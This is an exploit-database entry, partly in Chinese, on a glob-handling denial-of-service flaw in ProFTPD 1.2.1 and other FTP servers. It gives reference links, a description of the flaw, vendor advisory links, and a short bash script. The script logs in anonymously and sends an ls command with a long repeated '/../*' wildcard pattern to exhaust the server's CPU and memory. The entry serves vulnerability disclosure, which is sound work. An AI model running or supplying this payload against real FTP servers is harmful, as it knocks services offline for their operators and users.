https://www.exploit-db.com/exploits/20690
https://www.securityfocus.com/bid/89750
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200112-252

ProFTPD1.2.1和可能其他版本的glob函数存在漏洞。因此攻击者可以借助带有超长wildcard和其他特殊字符的命令导致服务拒绝（CPU和内存消耗），正如使用带有多个（1）”*/..”，(2)”*/.*”或(3)参数中的”.*./*?/”序列ls命令。

source: http://www.securityfocus.com/bid/2496/info

Many FTP servers are vulnerable to a denial of service condition resulting from poor globbing algorithms and user resource usage limits.

Globbing generates pathnames from file name patterns used by the shell, eg. wildcards denoted by * and ?, multiple choices denoted by {}, etc.

The vulnerable FTP servers can be exploited to exhaust system resources if per-user resource usage controls have not been implemented. 

#!/bin/bash=20
ftp -n FTP-SERVER<<end=20
quot user anonymous
bin
quot pass [email protected]
ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
bye=20
end=20

ProFTPD Project ProFTPD 1.2.1

来源:CONECTIVA
名称:CLA-2002:450
链接:http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio;=000450
来源:MANDRAKE
名称:MDKSA-2002:005
链接:http://www.mandriva.com/security/advisories?name=MDKSA-2002:005